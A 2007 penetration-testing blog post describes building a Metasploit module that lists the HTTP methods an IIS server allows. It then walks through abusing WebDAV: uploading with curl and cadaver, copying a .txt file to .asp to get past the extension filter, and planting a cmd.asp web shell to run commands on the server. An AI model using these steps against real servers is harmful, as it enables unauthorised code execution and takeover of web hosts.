carnal0wnage [Shared Reader]

Sunday, August 19, 2007

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module i wanted to see if i could get one going that would be pull down the HTTP Verbs allowable on a web server.

Basically i wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0


HTTP/1.1 200 OK

Connection: close

Date: Sun, 19 Aug 2007 05:18:55 GMT

Server: Microsoft-IIS/6.0

MicrosoftOfficeWebServer: 5.0_Pub

X-Powered-By: ASP.NET

Content-Length: 0

Accept-Ranges: bytes

DASL:

DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Cache-Control: private


cg@segfault:~/evil/msf3$

but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.

**more on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...

**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldnt get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

from there you will want to upload your cmd.asp so you can execute commands on the box.


Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)



Interacting with out cmdx.aspx to list the directory contents of the C drive


-CG

No comments: